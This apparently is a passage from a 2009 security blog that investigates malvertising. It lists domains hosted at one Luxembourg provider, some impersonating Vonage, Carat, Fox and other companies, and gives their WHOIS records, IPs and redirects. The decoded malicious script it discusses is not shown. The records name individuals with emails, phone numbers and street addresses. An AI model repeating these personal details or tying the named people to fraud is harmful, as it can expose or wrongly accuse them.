Note the two areas of code highlighted by the arrows.  I find it interesting that the miscreants are going to the trouble of using some (basic) encoding.

If we decode the script at the end, we get this:

Again, there is a little bit of (basic) encoding to get rid of, which leaves us with this:

Another interesting thing to note about this particular incident is that the malicious code only seems to appear once per IP address.  If I nuke the sandbox I am using, the redirect does not recur, but if I change my IP address, then I can reproduce the redirect as often as I wish.

Ok, so let’s take a look at these new domains, gogomediacenter.com, sys17med.com and praharesorts.cn.  I think we can say that Root Esolutions, Luxembourg is turning into a bit of a cesspool, and yes, it is the same IP range as the domains revealed in my earlier blog post :(

gogomediacenter.com
ICANN Registrar: BIZCN.COM, INC
Created 26 August 2008

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Shares IP with the domains bestmediamind.com, pro-drugstore.com and yakaboopromo.com (all domains should be treated with extreme caution).

Registrant:
Mediaswan
Frank Roberts (frank@mailqueen.com)
2128054649 fax: 2128054649
2130 Small Street
New York, NY 10007

sys17media.com
ICANN Registrar: BIZCN.COM, INC
Created 2 September 2009

IP: 212.117.166.70 - Luxembourg, Root Esolutions

Shares IP with the domains doubleclick-ssl.com and verilline.com (both domains should be treated with extreme caution).

Registrant:
DNS Admin (d71245@registar.com)
580-433-9026 fax: 580-433-9026
2654 Cody Ridge Rd
Clinton OK 73601

praharesorts.cn
ICANN Registrar (Chinese)
Created 28 August 2009

IP: 83.133.126.155 - Lncde-greatnet-newmedia, Germany

Administrative email: webmaster@seniorstuds.com.ar (no such domain)

bestmediamind.com
ICANN Registrar: BIZCN.COM, INC
Created 26 June 2009

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Registrant:
Bob Robertson (bobrobertsonscmpbst@gmail.com)
6172679396
159 Newbury Street
Boston, MA 02116

yakaboopromo.com
ICANN Registrar: BIZCN.COM, INC
Created 26 June 2009

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Registrant:
John Robertson (johnrobertsoncmpbst@gmail.com)
6172679396
159 Newbury Street
Boston MA 02116

pro-drugstore.com
ICANN Registrar: ENOM, INC
Created 29 January 2009

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Registration service contact director@climbing-games.com (regular readers of this blog will recognise that email address)

Registrant:
Jack Hum (no email)
208 W. 1st St. CA 90012
Los Angeles 90012
Tel: +1 2338824832

doubleclick-ssl.com
ICANN Registrar: BIZCN.COM, INC
Created 20 August 2009

IP: 212.117.166.70 - Luxembourg, Root Esolutions

Registrant:
doubleclick-ssl.com
Carolyn Hooley (carolyn@doubleclick-ssl.com)
845-223-3913 fax: 845-223-3913
4619 Camdem Place
Lagrangeville NY 12540

verilline.com
ICANN Registrar: BIZCN.COM, INC
Created 29 July 2009

IP: 212.117.166.70 - Luxembourg, Root Esolutions

Registrant:
Lithpro Co
Linda Thompson (info@lithpro.com)
3037989467 fax: 3037989467
2600 W 104th Ave
Boston CO 80234

ALERT: Impersonation of legitimate advertising networks and companies

This investigation began after I was alerted to the fact that somebody has been posing as a Vonage representative, and using the domain vonage-inc.com while doing so.

The domain vonage-inc.com was created on 5 August 2009, and the ICANN Registrar is BIZCN.COM, Inc.  It is hosted by Root Esolutions, Luxembourg (IP address 212.117.166.71).

Registrant details:

Vonage-Inc
Domain Administrator (itadmin@vonage-inc.com)
7322643911 fax 7322643911
4 South Holmdel Road
Holmdel NJ 07733

Interestingly, it looks like Vonage may have already taken control of vonage-inc.com.  This is because domaintools.com reports that vonage-inc.com has an IP address of 212.117.166.71, and that it is using the name servers NS1.EVERYDNS.NET and NS2.EVERYDNS.NET but Robtex, on the other hand, reports that vonage-inc.com no longer has an IP address, and that it is using the name servers dns-auth-00.kewr0.s.vonagenetworks.net. dns-auth-00.kiad0.s.vonagenetworks.net. dns-auth-00.klax1.s.vonagenetworks.net and dns-auth-00.klga1.s.vonagenetworks.net.

My grateful thanks go to the gentleman who alerted me to the goings-on involving vonage-inc.com.  His alert has led to the exposure of several other domains are could also be used to impersonate legitimate companies.

Several other domains can be found at same IP address that vonage-inc.com was using (212.117.166.71).  All of the domains should be treated with extreme caution.  When we bear in mind the warning that somebody has been posing as a Vonage representative while using the domain vonage-inc.com, I think it is safe to assume that somebody is planning to pose as (or is already posing as) a representative of Adconion, Carat, Fox Media, Lacoste, Orange or Pubmatic.

Here are details of other domains at IP 212.117.166.71 as at time of writing.  All but one are redirecting visitors to other, legitimate, domains. 

You will note that all of the domains, bar one, have the same ICANN Registrar, being BIZCN.COM, INC.

adconion-inc.com
ICANN Registrar: BIZCN.COM, Inc
Created 10 Aug 2009
Registrant:
adconion-inc.com
IT Admin (admin@adconion-inc.com)
498951490701 fax: 498951490701
Bayerstrasse 41
Muenchen Bavaria 80335

adconion-inc.com is currently redirecting visitors to the legitimate domain adconion.com (IP 89.110.133.18, ICANN Registrar Ascio Technologies, Inc, Registrant address Lindwurmstr.114, Muenchen, Bavaria 80337)

*****

adjimbo.com
ICANN Registrar: BIZCN.COM, Inc.
Created 9 June 2009

Registrant:
Registar services Co
Jack Omands (jacksosomands@gmail.com)
352691787
10 rue Large
Luxembourg Luxembourg 1918

Address as per web site: 260 Peachtree street, Suite 2200, Atlanta, Georgia 30303, US

Note: 260 Peachtree Street, Suite 2200, is a Regus property.  Regus operates business centres, virtual offices, virtual PA's etc.

*****

carat-inc.com
ICANN Registrar: BIZCN.COM, INC
Created 10 August 2009

Registrant:
Carat-inc.com
IT Administrator (admin@carat-inc.com)
441179045055 fax: 441179045055
90 Great Portland Street
London London W1W 5QZ

carat-inc.com is currently redirecting visitors to the legitimate domain carat.com (IP 91.206.177.56, Aegis Group Plc, UK - ICANN Registrar GROUP NBT PLC AKA NETNAMES, Registrant: Aegis Group plc, 180 Great Portland Street, London W1W 5QZ)

*****

foxinteractivemedia-inc.com
ICANN Registrar: BIZCN.COM, INC
Created 10 August 2009

Registrant:
domain admin (admin@foxinteractivemedia-inc.com)
3102750087 fax: 3102750087
424 N. Beverly Dr
Beverly Hills CA 90210

foxinteractivemedia-inc.com is currently redirecting visitors to the legitimate domain fox.com (IP 80.67.66.57, Akamai Technologies, ICANN Registrar MARKMONITOR, INC, Registrant address: Intellectual Property Department, Twentieth Century Fox Film Corporation, PO Box 900, Beverley Hills CA 90213-0900)

*****

lacoste-ads.com (note, we have encountered lacoste-ads.com before, as discussed here:
http://msmvps.com/blogs/spywaresucks/archive/2009/04/23/1690197.aspx)
ICANN Registrar: NETFIRMS, INC
Created 2 March 2009
Registrant details hidden behind a WHOIS privacy protection service (Domain Privacy Group)

lacoste-ads.com is currently redirecting visitors to the legitimate domain lacoste.com (IP 199.93.55.126, ICANN Registrar Core Internet Council of Registrars, Registrant VIAL TRIBOULET catherine, Lacoste S.A., 8 rue de Castiglione, Paris)

*****

orangeadvertising-inc.com
ICANN Registrar: BIZCN.COM, INC
Created 10 August 2009

Registrant:
Orangeadvertising
Network Administrator: admin@orangeadvertising.us
441179045053 fax: 441179045053
6400 North Radcliffe St
Bristol Bristol BS9 4AU
GB

orangeadvertising-inc.com is currently redirecting visitors to the legitimate domain orange.com (IP 194.2.208.16, Telecom France, Registrant: Orange Personal Communications Services Limited, St James Court, Great Park Road, Almondbury Park, Bradley Stoke, Bristol, UK, Tel: )

Note: the domain orangeadvertising.us (used for the Network Administrator's contact email address) has never been registered.

*****

pubmatic-inc.com
ICANN Registrar: BIZCN.COM, INC
Created 10 August 2009

Registrant:
IT Admin (itadmin@pubmatic-inc.com)
6508562386 fax: 6508562386
675 El Camino Real
Palo Alto CA 94301

pubmatic-inc.com is currently redirecting visitors to the legitimate pubmatic.com (IP 69.163.146.58, New Dream Network Llc, California, Registrant: Pubmatic, Inc, PO Box 975, Palo Alto, CA 94302)

*******************************

Other domains in the same IP range:

IP: 212.117.166.74

brightadsnetwork.com (visually almost identical to adjimbo.com – see above)
Address as per web site: 2115 North Charles Street, North Baltimore
ICANN Registrar: BIZCN.COM, INC
Created 14 June 2009

Registrant:
RegServ Co
Norman Jason (normanjason01223@gmail.com)
2127340192
20 Washington Street
New York New York 10006

topleanpro.com
ICANN Registrar: BIZCN.COM, INC
Created 18 June 2009

Registrant:
Domains Inform Inc
Thomas Kleineberg (thomaskleinebergdomains@gmail.com)
498999216255
Maximillianstrasse 18
Munich Munich 80539

*****

IP: 212.117.166.73

ad-advanced.com (address as per web site is Suite 300, 8875 Hidden River Parkway, Tampa which is a Regus asset)

ICANN Registrar: BIZCN.COM, INC
Created 1 July 2009

Registrant:
Norman Sebring (nsebring@rit-consulting.com)
5116 New Centre Drive
WILMINGTON NC 28403

*****

dnzmg.com (web site address Suite 410, 6802 Paragon Place, Richmond, Virginia - another Regus asset)

ICANN Registrar: BIZCN.COM, INC
Created 1 July 2009

Registrant:
Magnetic Wave
Daryl Lewis (markstein@mwa.com)
3035568550 fax: 3035568550
235 Columbine Street
Denver CO 80206

*****

vertixgroup.com (web site address 3525 Piedmont Road, 7 Piedmont Center, Atlanta - this address is for the HP Business Centre, a member of the Regus Group Network)

ICANN Registrar: BIZCN.COM, INC
Created 1 July 2009

Registrant:
Mark Stein (pholexkapsilow@gmail.com) (Mark Stein again? See Daryl Lewis email above)
2158554688 fax: 2158554688
1202 Market Street
Philadelphia PA 19107

ALERT: More malvertizing via Facebook applications?

Last time it was “Human Gifts” (aka Owned) that I wrote about on August 3:
ALERT- Malvertizing on Facebook and gaiaonline.com

This time it is the “We’re Related” application – an incident reported on August 18
http://community.tigranetworks.co.uk/blogs/tim_long/archive/2009/08/18/drive-by-downloads-from-facebook.aspx

And, according to a family member, her web browser’s security filter blocked her web browser from accessing something when playing Bubbletown (I quote: “a big red page came up”).  Something was going on there too.